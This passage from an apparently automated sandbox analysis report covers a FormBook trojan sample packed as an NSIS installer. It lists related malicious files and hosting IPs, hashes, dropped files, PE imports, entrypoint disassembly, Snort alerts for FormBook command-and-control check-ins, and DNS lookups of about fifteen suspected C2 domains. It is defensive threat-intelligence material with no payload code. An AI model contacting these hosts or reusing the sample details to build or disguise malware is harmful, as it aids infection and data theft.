                                                                      AMAZON-02US | Statement of Account.xlsx | malicious | 15.165.26.252
                                                                      AMAZON-02US | Shipping Documents.xlsx | malicious | 52.217.8.51
                                                                      AMAZON-02US | bmws51TeIm.exe | malicious | 3.141.177.1
                                                                      AMAZON-02US | Receipt779G0D675432.html | malicious | 52.219.97.138
                                                                      AMAZON-02US | PaymentAdvice-copy.htm | malicious | 52.51.245.167
                                                                      AMAZON-02US | Documents_460000622_1464906353.xls | malicious | 52.12.4.186
                                                                      GD-EMEA-DC-CGN1DE | AVRJERqIh4.exe | malicious | 80.67.16.8
                                                                      GD-EMEA-DC-CGN1DE | igPVY6UByI.exe | malicious | 80.67.16.8
                                                                      GD-EMEA-DC-CGN1DE | TaTYytHaBk.exe | malicious | 134.119.32.208
                                                                      GD-EMEA-DC-CGN1DE | 530000.exe | malicious | 141.0.20.5
                                                                      GD-EMEA-DC-CGN1DE | RFQ 117839 ASIA TRADING LLC.xlsx | malicious | 80.67.16.8
                                                                      GD-EMEA-DC-CGN1DE | M0uy4pgQzd.exe | malicious | 80.67.16.8
                                                                      GD-EMEA-DC-CGN1DE | inn.exe | malicious | 80.67.16.8
                                                                      GD-EMEA-DC-CGN1DE | h3dFAROdF3.exe | malicious | 92.204.33.8
                                                                      GD-EMEA-DC-CGN1DE | P0_4859930058_NEW_0RDER.xlsx | malicious | 92.204.33.8
                                                                      GD-EMEA-DC-CGN1DE | #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).js | malicious | 134.119.244.148
                                                                      GD-EMEA-DC-CGN1DE | #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).js | malicious | 134.119.244.148
                                                                      GD-EMEA-DC-CGN1DE | script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exe | malicious | 134.119.246.152
                                                                      GD-EMEA-DC-CGN1DE | app.exe.exe | malicious | 80.67.16.8
                                                                      ANONYMIZEEpikNetworkCH | Shipping Documents.xlsx | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | W88AZXFGH.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | Invoice No. 21SWZ020.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | igPVY6UByI.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | New Order.xlsx | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | MACHINE SPECIFICATION.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | PO_210316.exe.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | purchase order PO#00011.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | PO_210301.exe.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | PO_210224.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | 8nxKYwJna8.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | SecuriteInfo.com.generic.ml.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | EK6BR1KS50.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | FHT210995.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | TEC20201601.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | SUNEJ PAYMENT.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | JAAkR51fQY.exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | Order_385647584.xlsx | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | Order (2021.01.06).exe | malicious | 45.88.202.115
                                                                      ANONYMIZEEpikNetworkCH | INVOICE AMAZON.vbs | malicious | 45.88.202.111

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      Match | Associated Sample Name / URL | Detection
                                                                      C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll | Shipping Documents.xlsx | malicious

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\8r2vcudkhpr92uroe
                                                                        Process: C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type: data
                                                                        Category: dropped
                                                                        Size (bytes): 164864
                                                                        Entropy (8bit): 7.998873219224064
                                                                        Encrypted: true
                                                                        SSDEEP: 3072:nn20w7MzJn8Ecdxmy/6K7X/K8XKumqOiP/3DEruScsOAvVm1rwTsRftlP5zVrCyO:n20Tzedxb6K7/6uQ6H6Vm12WJVjgBH5
                                                                        MD5: 2DD0138B0F20AE5AC7177A1F06D6B8F0
                                                                        SHA1: C52CDC7ED9BF9F9083647E38A346A904C2EC2E71
                                                                        SHA-256: ABA2394C512FB8E15455DCCA08EFEE65851770AAD3E7BD893722B9D8AFA4FC82
                                                                        SHA-512: 5811FF52CC20674803B71283DFBC428CC3879C5D3CEB650783D6F7C3DCD337D06B1B4607219E82B902A542B74ACDADD0D337245B21364A0F43C895140AE20112
                                                                        Malicious: false
                                                                        Reputation: low
                                                                        C:\Users\user\AppData\Local\Temp\ael13j4hp6ajgnz
                                                                        Process: C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type: data
                                                                        Category: dropped
                                                                        Size (bytes): 6661
                                                                        Entropy (8bit): 7.95921652590791
                                                                        Encrypted: false
                                                                        SSDEEP: 192:7gyrXJsdJ0Yu2/s21RhjaSWyBi4tubwh/0fPpiQRFunaVtKib8R:7xbJsdJRu2E2BjaSWutub20PpiQXunaU
                                                                        MD5: 68AAAFB180E036036F4AF426F57AD27A
                                                                        SHA1: 5175001491EEBB7EA7C719522B8763F35164DC39
                                                                        SHA-256: D7CB9EFD854CF198E0B97202303C5DD24168886C5BEB4979CA99F13CDD43B94C
                                                                        SHA-512: 37693CE040DF7C3981A37639D3DC153A8CCC828A8F8DFAB9A34B8357D6B6AC9BDE1355BB7501B662EFF7323BD08D16DE5B7790F6C5C0FBC910ADBDFCBD51E9B6
                                                                        Malicious: false
                                                                        Reputation: low
                                                                        C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                        Process: C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category: dropped
                                                                        Size (bytes): 5120
                                                                        Entropy (8bit): 4.166853769661324
                                                                        Encrypted: false
                                                                        SSDEEP: 48:StR2JALQKHIPA15PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqSrS:EHL1IkYLlIhGXHBgVueKx
                                                                        MD5: 41F5D6CADD673464980F0835B0801D4D
                                                                        SHA1: 6753C31B14C5CFA9F3BCF8D05DB35554BE80BA68
                                                                        SHA-256: 491AB0BE0C90490BDC145350F86ED973C715DC2F9236D0BEB1A7E6EF8D04A4E8
                                                                        SHA-512: D61D598894350C5497DB9419678CA63705E64F3B4368DA1675ACD8E7DDF141B6C6D6CCC0AC821CF07F3464A2285DF95617E4A7BC1A8390CB46567D360B645210
                                                                        Malicious: false
                                                                        Joe Sandbox View:
                                                                        • Filename: Shipping Documents.xlsx, Detection: malicious
                                                                        Reputation: low

                                                                        Static File Info

                                                                        General

                                                                        File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit): 7.906066510460472
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name: TazxfJHRhq.exe
                                                                        File size: 207024
                                                                        MD5: f818665dd48a93c48255d3ceadf92a6e
                                                                        SHA1: 2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
                                                                        SHA256: 6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
                                                                        SHA512: ab05d43f21ca306ce3f0ab580206ef992fa7f004de21a15738448603e96213b16dd76c8e45fd625ed1c9c894ceded6fdfa8eca21874c405e9acc0fe84e961f4c
                                                                        SSDEEP: 6144:Hd99R20Tzedxb6K7/6uQ6H6Vm12WJVjgBHd:n9DzyxTSuQGUd

                                                                        File Icon

                                                                        Icon Hash: b2a88c96b2ca6a72

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint: 0x40314a
                                                                        Entrypoint Section: .text
                                                                        Digitally signed: false
                                                                        Imagebase: 0x400000
                                                                        Subsystem: windows gui
                                                                        Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major: 4
                                                                        OS Version Minor: 0
                                                                        File Version Major: 4
                                                                        File Version Minor: 0
                                                                        Subsystem Version Major: 4
                                                                        Subsystem Version Minor: 0
                                                                        Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [007A3030h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 0079E540h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 007A2780h
                                                                        call 00007F77F8BC53D8h
                                                                        mov ebx, 007AA400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F77F8BC2B19h
                                                                        test eax, eax
                                                                        jne 00007F77F8BC2BD6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F77F8BC53C3h
                                                                        call 00007F77F8BC2AF9h
                                                                        test eax, eax
                                                                        je 00007F77F8BC2CF2h
                                                                        mov edi, 007A9000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F77F8BC5381h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [007A9000h], 00000022h
                                                                        mov dword ptr [007A2F80h], eax
                                                                        mov eax, edi
                                                                        jne 00007F77F8BC2BBCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-11:10:06.077676 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 23.227.38.74 | 192.168.2.3
04/08/21-11:11:04.291694 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3
04/08/21-11:11:09.627646 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
04/08/21-11:11:09.627646 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
04/08/21-11:11:09.627646 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.3 | 192.185.48.194
04/08/21-11:11:14.966415 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49746 | 34.102.136.180 | 192.168.2.3
04/08/21-11:11:20.052568 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
04/08/21-11:11:20.052568 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
04/08/21-11:11:20.052568 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 52.58.78.16
04/08/21-11:11:30.573548 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49749 | 23.227.38.74 | 192.168.2.3

                                                                        Network Port Distribution

                                                                        TCP Packets


                                                                        UDP Packets

                                                                        Apr 8, 2021 11:10:22.699301958 CEST53589878.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:23.580167055 CEST5657953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:23.599790096 CEST53565798.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:27.944003105 CEST6063353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:28.052412033 CEST53606338.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:38.329937935 CEST6129253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:38.376888037 CEST53612928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:43.618215084 CEST6361953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:43.652030945 CEST53636198.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.718440056 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:48.759172916 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:53.839416027 CEST6194653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:53.887645006 CEST53619468.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:56.644263983 CEST6491053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:56.656802893 CEST53649108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.730592966 CEST5212353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:58.763911963 CEST53521238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.942035913 CEST5613053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:59.049151897 CEST53561308.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:04.120409966 CEST5633853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:04.159924030 CEST53563388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:09.325669050 CEST5942053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:09.481863976 CEST53594208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:14.792407036 CEST5878453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:14.825829983 CEST53587848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:19.976470947 CEST6397853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:20.030536890 CEST53639788.8.8.8192.168.2.3

                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 11:10:00.055316925 CEST | 192.168.2.3 | 8.8.8.8 | 0x82c | Standard query (0) | www.jamessicilia.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:05.594171047 CEST | 192.168.2.3 | 8.8.8.8 | 0xcf2c | Standard query (0) | www.kinfet.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:11.107856989 CEST | 192.168.2.3 | 8.8.8.8 | 0x693a | Standard query (0) | www.productsoffholland.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:16.987714052 CEST | 192.168.2.3 | 8.8.8.8 | 0x70f8 | Standard query (0) | www.markmalls.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:22.579443932 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a6b | Standard query (0) | www.zhuledao.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:27.944003105 CEST | 192.168.2.3 | 8.8.8.8 | 0x2af8 | Standard query (0) | www.jcernadas.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:38.329937935 CEST | 192.168.2.3 | 8.8.8.8 | 0xd7fc | Standard query (0) | www.theholisticbirthco.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:43.618215084 CEST | 192.168.2.3 | 8.8.8.8 | 0xf91f | Standard query (0) | www.glgshopbd.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:48.718440056 CEST | 192.168.2.3 | 8.8.8.8 | 0x437a | Standard query (0) | www.tor-one.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:53.839416027 CEST | 192.168.2.3 | 8.8.8.8 | 0xa308 | Standard query (0) | www.de-knutselkeet.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:58.942035913 CEST | 192.168.2.3 | 8.8.8.8 | 0xb165 | Standard query (0) | www.autotrafficbot.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:04.120409966 CEST | 192.168.2.3 | 8.8.8.8 | 0xda3d | Standard query (0) | www.curiosityisthecurebook.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:09.325669050 CEST | 192.168.2.3 | 8.8.8.8 | 0xb04 | Standard query (0) | www.usinggroovefunnels.com | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:14.792407036 CEST | 192.168.2.3 | 8.8.8.8 | 0x8358 | Standard query (0) | www.cgpizza.net | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:19.976470947 CEST | 192.168.2.3 | 8.8.8.8 | 0x3223 | Standard query (0) | www.physicalrobot.com | A (IP address) | IN (0x0001)

                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 11:10:00.211360931 CEST | 8.8.8.8 | 192.168.2.3 | 0x82c | No error (0) | www.jamessicilia.com | | 208.91.197.91 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:05.924069881 CEST | 8.8.8.8 | 192.168.2.3 | 0xcf2c | No error (0) | www.kinfet.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:10:05.924069881 CEST | 8.8.8.8 | 192.168.2.3 | 0xcf2c | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:11.175832033 CEST | 8.8.8.8 | 192.168.2.3 | 0x693a | No error (0) | www.productsoffholland.com | productsoffholland.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:10:11.175832033 CEST | 8.8.8.8 | 192.168.2.3 | 0x693a | No error (0) | productsoffholland.com | | 45.82.188.40 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:17.028974056 CEST | 8.8.8.8 | 192.168.2.3 | 0x70f8 | No error (0) | www.markmalls.com | | 35.240.239.44 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | www.zhuledao.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 52.15.160.167 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.13.255.157 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.14.206.30 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:28.052412033 CEST | 8.8.8.8 | 192.168.2.3 | 0x2af8 | No error (0) | www.jcernadas.com | | 52.216.152.43 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | www.theholisticbirthco.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:43.652030945 CEST | 8.8.8.8 | 192.168.2.3 | 0xf91f | Server failure (2) | www.glgshopbd.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:48.759172916 CEST | 8.8.8.8 | 192.168.2.3 | 0x437a | No error (0) | www.tor-one.com | | 80.67.16.8 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:53.887645006 CEST | 8.8.8.8 | 192.168.2.3 | 0xa308 | No error (0) | www.de-knutselkeet.com | | 188.93.150.75 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:10:59.049151897 CEST | 8.8.8.8 | 192.168.2.3 | 0xb165 | No error (0) | www.autotrafficbot.com | | 45.88.202.115 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:04.159924030 CEST | 8.8.8.8 | 192.168.2.3 | 0xda3d | No error (0) | www.curiosityisthecurebook.com | curiosityisthecurebook.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:11:04.159924030 CEST | 8.8.8.8 | 192.168.2.3 | 0xda3d | No error (0) | curiosityisthecurebook.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:09.481863976 CEST | 8.8.8.8 | 192.168.2.3 | 0xb04 | No error (0) | www.usinggroovefunnels.com | usinggroovefunnels.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:11:09.481863976 CEST | 8.8.8.8 | 192.168.2.3 | 0xb04 | No error (0) | usinggroovefunnels.com | | 192.185.48.194 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:14.825829983 CEST | 8.8.8.8 | 192.168.2.3 | 0x8358 | No error (0) | www.cgpizza.net | cgpizza.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:11:14.825829983 CEST | 8.8.8.8 | 192.168.2.3 | 0x8358 | No error (0) | cgpizza.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:11:20.030536890 CEST | 8.8.8.8 | 192.168.2.3 | 0x3223 | No error (0) | www.physicalrobot.com | | 52.58.78.16 | A (IP address) | IN (0x0001)

                                                                        HTTP Request Dependency Graph


                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 208.91.197.91 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
